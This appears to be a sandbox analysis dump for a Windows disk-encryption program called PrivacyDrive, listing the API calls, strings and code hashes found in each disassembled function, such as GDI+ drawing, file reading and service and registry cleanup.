                                • GetDesktopWindow.USER32 ref: 0042B9F7
                                • GetWindow.USER32(00000000), ref: 0042B9FE
                                • IsWindow.USER32(00000000), ref: 0042BA07
                                • GetPropW.USER32(00000000,Privacy Drive Std Dialog Activation), ref: 0042BA19
                                • GetWindow.USER32(00000000,00000002), ref: 0042BA22
                                • IsWindow.USER32(00000000), ref: 0042BA2B
                                Strings
                                • Privacy Drive Std Dialog Activation, xrefs: 0042BA17
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Window$DesktopProp
                                • String ID: Privacy Drive Std Dialog Activation
                                • API String ID: 4103027390-1971693912
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D26A
                                • OpenServiceW.ADVAPI32(00000000,PrivacyDrive,000F01FF), ref: 0041D282
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D2AF
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?), ref: 0041CD38
                                  • Part of subcall function 0041CD20: ControlService.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0041CD51
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?,?,00000001,?,?,?,?,?), ref: 0041CD65
                                  • Part of subcall function 0041CD20: Sleep.KERNEL32(000000FA,?,?,?,00000001,?,?,?,?,?), ref: 0041CD7A
                                • DeleteService.ADVAPI32(00000000), ref: 0041D296
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D29D
                                • Sleep.KERNEL32(000001F4), ref: 0041D2A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
                                • String ID: PrivacyDrive
                                • API String ID: 2902594379-2858902902
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D2CA
                                • OpenServiceW.ADVAPI32(00000000,PDSvc,000F01FF), ref: 0041D2E2
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D30F
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?), ref: 0041CD38
                                  • Part of subcall function 0041CD20: ControlService.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0041CD51
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?,?,00000001,?,?,?,?,?), ref: 0041CD65
                                  • Part of subcall function 0041CD20: Sleep.KERNEL32(000000FA,?,?,?,00000001,?,?,?,?,?), ref: 0041CD7A
                                • DeleteService.ADVAPI32(00000000), ref: 0041D2F6
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D2FD
                                • Sleep.KERNEL32(000001F4), ref: 0041D308
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
                                • String ID: PDSvc
                                • API String ID: 2902594379-694389191
                                APIs
                                • GdipCreateImageAttributes.GDIPLUS(?,7563D392), ref: 004CB826
                                • GdipSetImageAttributesGamma.GDIPLUS(00000000,00000001,00000001), ref: 004CB848
                                • GdipGetImageHeight.GDIPLUS(?,00000000), ref: 004CB870
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004CB893
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004CB8B0
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 004CB8CA
                                • GdipDrawImageRectRectI.GDIPLUS(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000000,00000000), ref: 004CB8FB
                                • GdipDisposeImageAttributes.GDIPLUS(00000000), ref: 004CB912
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: GdipImage$Attributes$HeightRectWidth$CreateDisposeDrawGamma
                                • String ID:
                                • API String ID: 2893027462-0
                                APIs
                                • GetDC.USER32(00000000), ref: 004713DC
                                • GdipCreateFromHDC.GDIPLUS(00000000,?,?,?,?,?,?,?,005450A0,000000FF,?,00471317), ref: 004713F8
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00471429
                                • GdipSetTextRenderingHint.GDIPLUS(00471317,00000005), ref: 0047143B
                                • GdipMeasureString.GDIPLUS(00471317,?,000000FF,00000000,?,00000000,?,000000FF,?), ref: 00471481
                                • ReleaseDC.USER32(00000000,00000000), ref: 00471492
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0047149F
                                • GdipDeleteGraphics.GDIPLUS(00471317), ref: 004714AD
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsHintMeasureReleaseRenderingText
                                • String ID:
                                • API String ID: 1461394554-0
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00430770
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00430788
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 004307B5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004307C7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 004307F0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00430802
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$TIP
                                • API String ID: 904232820-147420040
                                APIs
                                • GetLocalTime.KERNEL32(?,?,?,0056C40C,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,?,?), ref: 004B2B81
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ByteCharException@8LocalMultiThrowTimeWidestd::exception::exception
                                • String ID: !@$8GW$Verify1.dat$Verify2.dat$invalid string position
                                • API String ID: 658754322-3542193857
                                APIs
                                • GdipCreateStringFormat.GDIPLUS ref: 00426A19
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00426A38
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 00426A49
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000005,?,00000000,00000000,?,00000000,00000000,FF414141), ref: 00426AF9
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 00426B48
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00426D0D
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00426D1B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$AlignHintMeasureRenderingText
                                • String ID:
                                • API String ID: 3667060907-0
                                APIs
                                  • Part of subcall function 004A3510: GetDC.USER32(00000000), ref: 004A354E
                                  • Part of subcall function 004A3510: GdipCreateFromHDC.GDIPLUS(00000000,000000FF), ref: 004A356B
                                  • Part of subcall function 004A3510: GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A35C4
                                  • Part of subcall function 004A3510: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A35DB
                                  • Part of subcall function 004A3510: GdipSetTextRenderingHint.GDIPLUS(005496D0,00000005), ref: 004A3617
                                  • Part of subcall function 004A3510: GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 004A362D
                                • GdipSetStringFormatTrimming.GDIPLUS(000000FF,00000004,?,00000000,7563D392,00000000,?), ref: 004A32E4
                                • GdipSetStringFormatLineAlign.GDIPLUS(000000FF,00000000), ref: 004A3307
                                  • Part of subcall function 004A37E0: GetDC.USER32(00000000), ref: 004A3818
                                  • Part of subcall function 004A37E0: GdipCreateFromHDC.GDIPLUS(00000000,00549710,?,?,?,?,?,?,?,?,?,?,?,?,-00000064), ref: 004A3837
                                  • Part of subcall function 004A37E0: GdipCreateStringFormat.GDIPLUS(00000000), ref: 004A389F
                                  • Part of subcall function 004A37E0: SystemParametersInfoW.USER32(00000030,00000000,-00000064,00000000), ref: 004A38C4
                                  • Part of subcall function 004A37E0: GdipSetTextRenderingHint.GDIPLUS(000000FF,00000005), ref: 004A38ED
                                  • Part of subcall function 004A37E0: GdipSetStringFormatTrimming.GDIPLUS(00000000,00000000), ref: 004A3900
                                • GdipSetStringFormatTrimming.GDIPLUS(000000FF,00000004,?,00000000,7563D392,00000000,?), ref: 004A32F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$FormatString$CreateTrimming$FromHintInfoParametersRenderingSystemText$AlignLine
                                • String ID: !@$cbfxMessageBox$d
                                • API String ID: 1862861530-2623893205
                                • Opcode ID: fd805fc617f23f0ddbbec1510adcb90817351557563ff82dc7ba3c138e43fe3e
                                • Instruction ID: d1a81a9ce38d88d882e8ecf0d38e09747c162d49e0c5f859e7fe44805090d02b
                                • Opcode Fuzzy Hash: fd805fc617f23f0ddbbec1510adcb90817351557563ff82dc7ba3c138e43fe3e
                                • Instruction Fuzzy Hash: 93917C71A00209DFCB10CFA8D884BAEBBF1FF59314F14416AE905AB390EB75AA45DB44
                                APIs
                                Similarity
                                • API ID: ParentWindow$CaptureLongRectRelease
                                • String ID:
                                • API String ID: 1974726318-0
                                • Opcode ID: dee0282b1a9ecfe3e27abf076a0e776c20efda0c19094a7a7e3fdbf1b0c7a09e
                                • Instruction ID: 759902af7c881f52c76f688f99f54b69fd3a322a977c9367e2e64732b101450c
                                • Opcode Fuzzy Hash: dee0282b1a9ecfe3e27abf076a0e776c20efda0c19094a7a7e3fdbf1b0c7a09e
                                • Instruction Fuzzy Hash: 3C814B75A007059FEB60CF68C895FAABBF4BF44704F00491EE999A7380DB75B944CBA4
                                APIs
                                  • Part of subcall function 00489F70: GdipCreateStringFormat.GDIPLUS(00000000,00000000,000002CC,7563D392), ref: 00489FE7
                                  • Part of subcall function 00489F70: GdipSetStringFormatLineAlign.GDIPLUS(000002CC,00000001), ref: 0048A0FD
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • GdipCreatePath.GDIPLUS(00000000,00000670,000005B4,7563D392,?,?,00000000), ref: 0048638A
                                • GdipCreatePath.GDIPLUS(00000000,00000678,?,?,00000000), ref: 004863A2
                                • GdipCreatePath.GDIPLUS(00000000,00000680,?,?,00000000), ref: 004863BA
                                • GdipCreatePath.GDIPLUS(00000000,00000688,?,?,00000000), ref: 004863D2
                                • GdipCreatePath.GDIPLUS(00000000,00000690,?,?,00000000), ref: 004863EA
                                  • Part of subcall function 00489E40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00489E7C
                                Strings
                                Similarity
                                • API ID: Gdip$Create$Path$Concurrency::details::_Concurrent_queue_base_v4::_FormatInternal_throw_exceptionString$AlignLine
                                • String ID: %
                                • API String ID: 3993587154-2567322570
                                • Opcode ID: 78104fb18b7a79f78cd620dd19bb917500539e83cf270f67fb2314767728e3a4
                                • Instruction ID: 255bfa3c1203ba6c6611ab499229da4eb4c3a6f4232d4012b071132f61ba6529
                                • Opcode Fuzzy Hash: 78104fb18b7a79f78cd620dd19bb917500539e83cf270f67fb2314767728e3a4
                                • Instruction Fuzzy Hash: 54A109B0805389DEDB10DF58C55878ABFF0BF05318F1981ADD858AF292D7B99608CFA1
                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040905E), ref: 0042E13A
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042E1C7
                                • GetCursorPos.USER32(?), ref: 0042E1DD
                                • SetWindowPos.USER32(00000000), ref: 0042E2BD
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040905E), ref: 0042E30B
                                • SetWindowPos.USER32(00000000), ref: 0042E33D
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042E34E
                                Similarity
                                • API ID: CriticalSection$EnterWindow$CursorInfoLeaveParametersSystem
                                • String ID:
                                • API String ID: 3542279758-0
                                • Opcode ID: f77588df6d40e2a2c5452458e22c8c1e4378ac40ec64d7b6d3882e35b73d68b7
                                • Instruction ID: 0adf947a82cc22e8cdadf97dfe462cb4a18e9a362bfee68fe9ccfdf355158ebd
                                • Opcode Fuzzy Hash: f77588df6d40e2a2c5452458e22c8c1e4378ac40ec64d7b6d3882e35b73d68b7
                                • Instruction Fuzzy Hash: CB61DD30304311EBD708CB65DC98FAAB7A9BF89704F50061EF55697290DB34A954CBAA
                                APIs
                                Strings
                                Similarity
                                • API ID: _memmove
                                • String ID: M$M
                                • API String ID: 4104443479-2716082652
                                • Opcode ID: 5bb24ca44c51592907520856addba2660847b11f1b4736d21d04624c9af85700
                                • Instruction ID: 63af274ed7d252d932b86dd0c62c3c644047ca8161c42c53bd65e7e67be1847d
                                • Opcode Fuzzy Hash: 5bb24ca44c51592907520856addba2660847b11f1b4736d21d04624c9af85700
                                • Instruction Fuzzy Hash: 0851C571A002049FDB24DF2CD85579EBBB4FF44314F14866EE8169B381D736E905CB90
                                APIs
                                • GlobalAlloc.KERNEL32(00000000,00000001,?,?,00000001,7563D392,00000001), ref: 004203B2
                                • GlobalLock.KERNEL32(00000000), ref: 004203C3
                                • _memmove.LIBCMT ref: 004203D7
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000), ref: 004203E5
                                  • Part of subcall function 004207F0: GdipAlloc.GDIPLUS(00000010,7563D392,00000000,?,00000000,00000000,0053C6F8,000000FF,?,00420403), ref: 00420819
                                  • Part of subcall function 004207F0: GdipLoadImageFromStream.GDIPLUS(00000000,00000004), ref: 00420840
                                • GdipAlloc.GDIPLUS(00000010), ref: 0042041D
                                  • Part of subcall function 00408CC0: GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000,?,00420435), ref: 00408CD5
                                  • Part of subcall function 00408C90: GdipGetImageWidth.GDIPLUS(?,00000000,00000000,00000000,?,0042043D,00000000), ref: 00408CA5
                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GlobalUnlock.KERNEL32(00000000), ref: 00420513
                                • GlobalFree.KERNEL32(00000000), ref: 0042051A
                                Similarity
                                • API ID: Gdip$Global$AllocImage$CreateFromStream$BitmapFreeHeightLoadLockScan0UnlockWidth_memmove
                                • String ID:
                                • API String ID: 4275973583-0
                                • Opcode ID: df9a8e73d0d2d87e9b2bc4ecfa5719eec9267313256c40909baa2f8efe438889
                                • Instruction ID: 2f1dcf6bd82019c055be1a15501efeb8104742cb9a65ed52b3ae44e9ef144ca2
                                • Opcode Fuzzy Hash: df9a8e73d0d2d87e9b2bc4ecfa5719eec9267313256c40909baa2f8efe438889
                                • Instruction Fuzzy Hash: 7351C170B00216AFCB14EF66D854A7FB7F5AF49710F44812EE905AB352DB38AD40CBA5
                                APIs
                                • GlobalAlloc.KERNEL32(00000000,?,?,00000000,?,7563D392,?,00000000), ref: 004C5118
                                • GlobalLock.KERNEL32(00000000), ref: 004C5129
                                • _memmove.LIBCMT ref: 004C513D
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?,00000000), ref: 004C514B
                                  • Part of subcall function 004207F0: GdipAlloc.GDIPLUS(00000010,7563D392,00000000,?,00000000,00000000,0053C6F8,000000FF,?,00420403), ref: 00420819
                                  • Part of subcall function 004207F0: GdipLoadImageFromStream.GDIPLUS(00000000,00000004), ref: 00420840
                                • GdipAlloc.GDIPLUS(00000010,?,00000000), ref: 004C5183
                                  • Part of subcall function 00408CC0: GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000,?,00420435), ref: 00408CD5
                                  • Part of subcall function 00408C90: GdipGetImageWidth.GDIPLUS(?,00000000,00000000,00000000,?,0042043D,00000000), ref: 00408CA5
                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GlobalUnlock.KERNEL32(00000000), ref: 004C5273
                                • GlobalFree.KERNEL32(00000000), ref: 004C527A
                                Similarity
                                • API ID: Gdip$Global$AllocImage$CreateFromStream$BitmapFreeHeightLoadLockScan0UnlockWidth_memmove
                                • String ID:
                                • API String ID: 4275973583-0
                                • Opcode ID: 1e2e060ec0da00ee9f387aa5d731a758271d09dbe4a9b31f959fd7921f91698c
                                • Instruction ID: 9dc68ff19be282a25164d7e04648bc6ea08636f13c523602c7a605cb811b94a2
                                • Opcode Fuzzy Hash: 1e2e060ec0da00ee9f387aa5d731a758271d09dbe4a9b31f959fd7921f91698c
                                • Instruction Fuzzy Hash: 8751E335B006199BDB10DFA6C895BBFB7F8AF88710F44412EF905A7381DB38A9448BD4
                                APIs
                                  • Part of subcall function 0052CF10: _fprintf.LIBCMT ref: 0052CF2A
                                  • Part of subcall function 0052CF10: _raise.LIBCMT ref: 0052CF31
                                • _memmove.LIBCMT ref: 0052B8B2
                                Strings
                                Similarity
                                • API ID: _fprintf_memmove_raise
                                • String ID: ct != NULL$pt != NULL$src\modes\xts\xts_decrypt.c$tweak != NULL$xts != NULL
                                • API String ID: 2200152502-2998850538
                                • Opcode ID: 69af57d825b34a94be16c29eabe8db33a23319598dd3570cadf2c9d73b110b87
                                • Instruction ID: 8280513a5b441771b58343394fae671bbf64bbb92aa6da1e3e6c352855151830
                                • Opcode Fuzzy Hash: 69af57d825b34a94be16c29eabe8db33a23319598dd3570cadf2c9d73b110b87
                                • Instruction Fuzzy Hash: 8B51C672D0022E6BEF15DE64ED81AEE7F68FF55304F140525FD08A7282E731AA04C791
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?), ref: 004B98C2
                                  • Part of subcall function 0041D940: OutputDebugStringW.KERNEL32(?,?,?), ref: 0041D9B6
                                  • Part of subcall function 0043A4E0: _memset.LIBCMT ref: 0043A542
                                • ReadFile.KERNEL32(?,?,01000000,?,00000000,01000000), ref: 004B991C
                                • ReadFile.KERNEL32(?,?,01000000,?), ref: 004B997C
                                • GetLastError.KERNEL32 ref: 004B998A
                                Strings
                                Similarity
                                • API ID: File$Read$DebugErrorLastOutputSizeString_memset
                                • String ID: FS = %I64u$md5
                                • API String ID: 349419775-909482460
                                • Opcode ID: dadd656dec2e0e05b8d618c9de2e422a0ca132c917cc803ae8a8d549baf79423
                                • Instruction ID: dfa75fa1de064dbe609fc4d66b00eb58ddb15790f5bef23362b76317e440eba1
                                • Opcode Fuzzy Hash: dadd656dec2e0e05b8d618c9de2e422a0ca132c917cc803ae8a8d549baf79423
                                • Instruction Fuzzy Hash: 43516BB16083009FD350CF19CC85B9BBBE8BF99354F000A2EF599873A0E775A944CB56
                                APIs
                                • _memmove.LIBCMT ref: 0042140F
                                • _memmove.LIBCMT ref: 00421444
                                • _memmove.LIBCMT ref: 0042147B
                                • _memmove.LIBCMT ref: 004214A3
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004214DD
                                Strings
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: deque<T> too long
                                • API String ID: 279611364-309773918
                                • Opcode ID: 332fe45bce1ebe25c49b9b6f0ec54a729c6560aaac7db5a74f0828855bb12c40
                                • Instruction ID: 0f62a651c2f72f77b9636ea5b42dad542b9fc3f9c1ccc4485bceb6f92b63de64
                                • Opcode Fuzzy Hash: 332fe45bce1ebe25c49b9b6f0ec54a729c6560aaac7db5a74f0828855bb12c40
                                • Instruction Fuzzy Hash: F941F371B001199BDB10DF98D880BAEB7BAAF94300F58862AD809D7355E774EE01CBE1
                                APIs
                                • _memmove.LIBCMT ref: 004F155F
                                • _memmove.LIBCMT ref: 004F1594
                                • _memmove.LIBCMT ref: 004F15CB
                                • _memmove.LIBCMT ref: 004F15F3
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004F162D
                                Strings
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: deque<T> too long
                                • API String ID: 279611364-309773918
                                • Opcode ID: 315e743d62de5e459ba6462f3202ae247cd7311b9eda939698d7d40590ba9eec
                                • Instruction ID: e137e9589e79232e9cf7c83c537a5ec3cf7130c1938c08cc892274d1298360be
                                • Opcode Fuzzy Hash: 315e743d62de5e459ba6462f3202ae247cd7311b9eda939698d7d40590ba9eec
                                • Instruction Fuzzy Hash: 7E41E371A00109EBDB10CF98C884BAEB77AFF84304F18862AD905D7255E775EE01CBE1
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B08D1
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09AF
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09D3
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B09EB
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0A0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [
                                • API String ID: 2222842502-2256786511
                                • Opcode ID: 2dd433a4466e8190e80c83dd1c8407de89c944d3811e56fd4639bc1149d10577
                                • Instruction ID: 32ef22c330c28f9c1a7aa09e0cbfab8f1505213d9d01966a38f542d01d71fa64
                                • Opcode Fuzzy Hash: 2dd433a4466e8190e80c83dd1c8407de89c944d3811e56fd4639bc1149d10577
                                • Instruction Fuzzy Hash: AC517D34A503049FE714DF68DC9AFD6B3A8BB08714F14467AEA15AB2D1CBB4B804CF65
                                APIs
                                • GetDC.USER32(00000000), ref: 0042E39D
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042E3B9
                                • GdipCreateStringFormat.GDIPLUS(00000000), ref: 0042E418
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0042E459
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042E4BF
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0042E4CC
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042E4DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID:
                                • API String ID: 2860005999-0
                                • Opcode ID: b8e99930b762ee35ec31d3eda8c2006f2a8ddef138ba6d27961e2d28fa441354
                                • Instruction ID: a1a35c500f5c863af352f852cd16a8bfb1f9d2364145a45e03f7e97dd071d77a
                                • Opcode Fuzzy Hash: b8e99930b762ee35ec31d3eda8c2006f2a8ddef138ba6d27961e2d28fa441354
                                • Instruction Fuzzy Hash: 57515671A00308EFDB15CFA9DC54BEEBBB4FB19315F10821AE915A7290E7756948CF60
                                APIs
                                • _memmove.LIBCMT ref: 004B0ACD
                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 004B0B9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memmove
                                • String ID: Hyperlink$ONLINE_HELP$Tasks.cpp$Version.xml
                                • API String ID: 963651277-4098510394
                                • Opcode ID: 0884fbb45de3e256870125da6faba786bfb2b3fcea749478bd3731b0a8574d4f
                                • Instruction ID: 82758cd91716046957feb2613f2f60d9e2b28db297af476576b0a681b9dbcf37
                                • Opcode Fuzzy Hash: 0884fbb45de3e256870125da6faba786bfb2b3fcea749478bd3731b0a8574d4f
                                • Instruction Fuzzy Hash: A4418F71108341AFE310DF51C846B9BBBE8FB94758F000A2DF585962D1EBB8E508CBA7
                                APIs
                                • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 004C450C
                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 004C4526
                                • lstrlenW.KERNEL32(?), ref: 004C455F
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,?), ref: 004C45AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,?,?,?), ref: 004C4601
                                • RegCloseKey.ADVAPI32(?), ref: 004C4617
                                • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 004C461F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
